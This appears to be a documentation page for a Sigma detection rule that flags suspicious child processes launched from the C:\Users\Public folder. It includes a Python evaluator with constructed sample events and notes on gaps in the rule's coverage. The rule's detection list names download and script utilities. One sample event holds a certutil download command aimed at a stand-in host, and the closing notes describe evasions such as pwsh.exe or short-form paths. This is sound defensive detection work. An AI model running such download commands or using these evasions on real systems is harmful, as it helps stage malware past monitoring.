Parent in Public Folder Suspicious Process
This rule detects suspicious child processes whose parent image lives under the C:\Users\Public folder, a directory writable by every interactive user and therefore a common staging location for droppers. It fires when the child's command line contains a script interpreter or a built-in download/decode utility (powershell, cmd with /c, /r or /k, wscript, cscript, bitsadmin, certutil, mshta).
Sigma rule
title: Parent in Public Folder Suspicious Process
id: 69bd9b97-2be2-41b6-9816-fb08757a4d1a
status: test
description: This rule detects suspicious processes with parent images located in the C:\Users\Public folder
references:
    - https://redcanary.com/blog/blackbyte-ransomware/
author: Florian Roth (Nextron Systems)
date: 2022/02/25
modified: 2022/11/18
tags:
    - attack.defense_evasion
    - attack.execution
    - attack.t1564
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|startswith: 'C:\Users\Public\'
        CommandLine|contains:
            - 'powershell'
            - 'cmd.exe /c '
            - 'cmd.exe /r '
            - 'cmd.exe /k '
            - 'cmd /c '
            - 'cmd /r '
            - 'cmd /k '
            - 'wscript.exe'
            - 'cscript.exe'
            - 'bitsadmin'
            - 'certutil'
            - 'mshta.exe'
    condition: selection
fields:
    - ComputerName
    - User
    - CommandLine
falsepositives:
    - Unknown
level: high
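To make the selection logic concrete, the following Python is an added example (not part of the Sigma project or this rule) that evaluates the rule's `ParentImage|startswith` and `CommandLine|contains` selection over a handful of constructed process_creation events. It applies Sigma's default case-insensitive string matching, and the sample events are invented here to show a plain hit, a mixed-case hit, a hit via cmd /c plus certutil, and several near-misses (a pwsh child, a parent under a different user, a sibling directory named C:\Users\PublicDocs, and an event with no CommandLine field).

```python
"""Evaluate the 'Parent in Public Folder Suspicious Process' selection
over constructed process_creation events.

Added example, not code from the Sigma repository. The events below are
constructed for illustration; the field names (ParentImage, CommandLine)
match the rule, the values are made up.
"""

# Selection values copied from the rule. Note the trailing backslash on the
# parent prefix and the trailing space on the cmd tokens: both are part of
# the literal match and matter (see the near-miss events below).
PARENT_PREFIX = "C:\\Users\\Public\\"
CMDLINE_TOKENS = [
    "powershell",
    "cmd.exe /c ", "cmd.exe /r ", "cmd.exe /k ",
    "cmd /c ", "cmd /r ", "cmd /k ",
    "wscript.exe", "cscript.exe",
    "bitsadmin", "certutil", "mshta.exe",
]


def matched_tokens(event: dict) -> list:
    """Return the CommandLine tokens that hit for this event, or [].

    Sigma string modifiers are case-insensitive by default, so both sides
    are lowercased before comparing. A missing field is treated as an
    empty string and therefore never matches.
    """
    parent = (event.get("ParentImage") or "").lower()
    if not parent.startswith(PARENT_PREFIX.lower()):
        return []
    cmdline = (event.get("CommandLine") or "").lower()
    return [tok for tok in CMDLINE_TOKENS if tok.lower() in cmdline]


def matches(event: dict) -> bool:
    """True when `condition: selection` is satisfied for the event."""
    return bool(matched_tokens(event))


def evaluate(events: list) -> list:
    """Return (index, matched tokens) for every event the rule fires on."""
    return [(i, matched_tokens(e)) for i, e in enumerate(events) if matches(e)]


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # 0: plain hit, script interpreter spawned from Public
    {"ParentImage": r"C:\Users\Public\update.exe",
     "CommandLine": 'powershell -nop -w hidden -c "Get-Process"'},
    # 1: mixed case still hits because matching is case-insensitive
    {"ParentImage": r"c:\users\public\Libraries\svc.exe",
     "CommandLine": "CMD.EXE /C whoami"},
    # 2: near-miss, pwsh.exe is not in the token list
    {"ParentImage": r"C:\Users\Public\tool.exe",
     "CommandLine": "pwsh.exe -c Get-Date"},
    # 3: near-miss, parent is under a regular user profile
    {"ParentImage": r"C:\Users\alice\app.exe",
     "CommandLine": "cmd.exe /c dir"},
    # 4: near-miss, sibling directory; the trailing backslash in the
    #    prefix prevents 'C:\Users\PublicDocs\' from matching
    {"ParentImage": r"C:\Users\PublicDocs\x.exe",
     "CommandLine": "mshta.exe page.hta"},
    # 5: near-miss, no CommandLine field recorded at all
    {"ParentImage": r"C:\Users\Public\a.exe"},
    # 6: hit on two tokens at once (cmd /c plus certutil)
    {"ParentImage": r"C:\Users\Public\Music\loader.exe",
     "CommandLine": "cmd /c certutil -urlcache -split -f "
                    "http://example.invalid/p.txt p.txt"},
]


if __name__ == "__main__":
    for idx, toks in evaluate(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"ALERT event {idx}: parent={ev['ParentImage']} tokens={toks}")
```

Two things the run makes visible that a reader of the YAML alone might miss: the rule keys on the child's command line, not its image, so a child launched as `pwsh.exe` or with the interpreter resolved from PATH without any of the listed strings in the command line is not covered; and the parent prefix is a literal path match, so a parent whose path is recorded with another drive letter or in 8.3 short form is not covered either. Neither is a defect in the rule, just the boundary of what it promises to catch.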
References
- https://redcanary.com/blog/blackbyte-ransomware/
Related rules
- Payload Decoded and Decrypted via Built-in Utilities
- Renamed CURL.EXE Execution
- Suspicious RASdial Activity
- Suspicious Runscripthelper.exe
- Renamed FTP.EXE Execution